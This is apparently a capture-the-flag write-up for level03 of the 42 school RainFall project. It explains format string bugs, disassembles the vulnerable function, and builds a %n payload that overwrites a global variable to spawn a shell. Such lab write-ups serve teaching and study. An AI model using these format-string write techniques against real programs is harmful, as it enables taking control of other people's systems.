Welcome to RainFall
๐ Level03 of Rainfall Project ๐
๐ Introduction
Hello, today Iโm gonna show you my read-me of the level03 of the rainfall project from 42 school.
๐พ What is a โFormat Stringโ Vulnerability ?
A format string vulnerability is a bug
where user input is passed as the format argument to printf, scanf, or another function in that family also called variadic
functions.
The format argument has many different specifies which could allow an attack to leak data or write onto the stack if they control the format argument.
Today the vulnerability is demonstrate with printf but it is possible with all format variadic function.
Since printf and similar variadic functions, they will continue popping data off of the stack according to the format.
For example, if we can make the format argument โ%x.%x.%x.%xโ, printf will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.
printf can also index to an arbitrary โargumentโ with the following syntax:
- `%n$x` (where n is the decimal index of the argument you want)
While these bugs are powerful, theyโre very rare nowadays, as all modern compilers warn when printf is called with a non constant string.
So, to get back to the point the format string vulnerability allows us to read/write (which weโll see later) to the stack or to specific location in memory.
๐ How to detect format string vulnerability ?
Iโm going to suggest two methods for identifying a โFormat String Vulnerabilityโ
If we pass the binary to objdump/r2/ghidra
at some point, you must see a call of a printf/scanf
or any call of a variadic function where the argument is not a constant string and where the format is controlled by an input user entry.
๐ฌ Searching the vulnerability
If I execute the following command with objdump, we see that there are two interesting functions in the main binary, you should have the v
and the main
functions.
The objdump output should like this
1 | 080484a4 <v>: |
The main
function call the v function and if we look a little more closely at the v
function we can see that:
1 | 080484a4 <v>: |
Of course, in x86-32 bit mode arguments are passed through the stack, Okay so you remember the first argument of printf is always and must a constant
string which represent a format
but the problem here is the previous function call is fgets
and as you can see the problem is also fgets read STDIN entry of the user and write the content of stdin into the buffer allocated on the stack I describe each instruction in the following Section.
๐ฌ Explaination of the problem
Look at this pieces of codes
1 | 080484a4 <v>: |
So push ebp
and mov ebp, esp
is a creation of the stack frame so is the prologue of the function v
.
The instruction sub esp, 0x218
allocate some space on the stack, remember the stack is a LIFO (Last In first Out) and grows downward, So there we allocate 536 bytes 0x218
in hexadecimal.
Next you can see this following instruction mov eax, ds:0x8049860
, at 0x8049860
is a constant provided by data segments ds
and if we examine that in gdb you can see is just a STDIN
so you know now this address is STDIN okay.
The following instruction is a parameters of fgets
function remember the arguments is passed in reverse order so the arguments at esp+0x8
is the third argument, second at esp+0x4
is the second argument, and at the top of the stack so at esp
(remember esp
is the Stack pointer or top of the stack) so the first parameters is on top of the stack.
If we enter man fgets
the prototype of the function is char *fgets(char s[restrict .size], int size, FILE *restrict stream);
So the parameters correspond perfectly.
After that, when the call to fgets is performed the fgets function return the buffer in eax
register and as you can see the buffer is also put on top of the stack and pass directly to printf
.
So youโr perfectly understand that pieces of code is vulnerable to format string vulnerability because you have an entry input user is directly pass as first argument to a printf
function, which means that the user has the control over the program input, so if we run the program and just try to display four times %x
.
see what happens
1 | โฏ ./level3 |
Cool we can now read on the stack !!!!
๐ป Pseudo Code of the v function
for sipplicity sake, you can also decompile the binary with ghidra or IDA pro or binary ninja and look at the pseudo code part.
1 | void v(void) |
As I said above, you can see that printf is called directly with the buffer, which is transmited after user input.
We can also choose the value we want to display on the stack like this for example :
- %2$x
This will take the second argument of printf and display it in hexadecimal format
1 | โฏ ./level3 |
As we can see the values are the same because we ask printf
to display the same argumen
4 times.
All right thatโs cool, we can read addresses from the stack, if the address point to a string we also replace the %x
with %s
which allows us to read a string.
Great but how can we write back to the stack or a variable or somewhere in the memory program ?
We need to use the %n
, the %n
writes the number of characters that printf succeeded in displaying.
weโre going to test with the level3 program, and if we look at it a little more closely we see that we have a symbols named m
in the .bss
section
Remember .bss
is a section in ELF format which contains uninitialised data.
The m
variable is a global variable, we can also see that with objdump command
1 | $ objdump -t ./level3 | grep "m" |
You should have this following output
1 | ./level3: format de fichier elf32-i386 |
So m
is at address 0x0804988c
and reside in the .bss
section
If we take our v
function decompiled above, it would look like this
1 | void v(void) |
you can see that m must be equal to 0x40
which is 64
in decimal.
โ๏ธ Writing our exploit and How write in M variable ?
- Set
m
address on the stack. - Write the value
0x40
(64 in decimal) atm
(0x0804988c
) address with%n
. - Trigger the condition
m == 0x40
and executesystem("/bin/sh")
.
Weโll need to set the address of m
on the stack, then choose the argument and write with %n
, but first weโll need to determine where our buffer begins.
๐ First determine where is our buffer
1 | $ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b' %p'*4)" |
1 | โฏ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b' %p'*4)" | ./level3 |
As you can see, Iโve written A 4 times as the first argument in hexadecimal. This corresponds to 0x41414141, so we can determine that our buffer location is at index 4.
1 | โฏ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b' %4\$p')" | ./level3 |
We can see that at index 4 our first parameter is still there, so we now know where we can write
๐ Second write the data at m address
1 | โฏ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b' %4\$p')" | ./level3 |
So were now going to put the address of m
in the place of our 4โs โAโ of course weโre on x86-32 bit architecture and this CPU reads memory in little endian.
So you must convert your address to little endian, So that CPU can read correctly.
So 0x0804988c
in little Endian is 0x8c980408
So if we replace the four bytes โAโ 0x41
you can get the correct address back
1 | โฏ python3 -c "import sys; sys.stdout.buffer.write(b'\x8c\x98\x04\x08' + b' %4\$p')" | ./level3 |
๐ก Tricks to convert bytes to little-endian
1 | from pwn import * |
The following methods are used to convert data to little-endian.
You can choose which method you method.
๐ Third Write the data
So, this is the final part of the exploit the writing data part.
Weโve put our address onto the stack but now we need to write 0x40
or 64 in decimal at m
location.
m
symbols is encoded on 4 bytes long and an address in x86 32 bits is 4 bytes.
As a remainder, the %n
option counts the number of characters printed by printf
.
If we want have 64 values at m
, we must substract the length of the address passed as a parameter (here 4) so 64 - 4 is 60
in decimal so 0x3c
in hexadecimal 0x3c
is the remainder padding to write the correct values, so weโll just have to write 60 more characters
So the payload final should look like this
1 | โฏ python3 -c "import sys; sys.stdout.buffer.write(b'\x8c\x98\x04\x08' + b'A'*60 + b'%4\$n')" | ./level3 |
As you can see, we have succeeded to entering in the condition because we have the string โWait what?!\nโ displayed on the screen.
1 | void v(void) |
But we didnโt get our shell back so we could keep our shell open like a cat or tail command.
So the final payload is that :
1 | โฏ (python3 -c "import sys; sys.stdout.buffer.write(b'\x8c\x98\x04\x08' + b'A'*60 + b'%4\$n')"; /bin/cat) | ./level3 |
1 | โฏ (python3 -c "import sys; sys.stdout.buffer.write(b'\x8c\x98\x04\x08' + b'A'*60 + b'%4\$n')"; /bin/cat) | ./level3 |
๐ฏ๏ธ Congratulations
Tada !!!
We Have our shell back and you can reach the flag ;)
You can also use the following script exploit with pwntools ;)
1 | #!/usr/bin/python3 |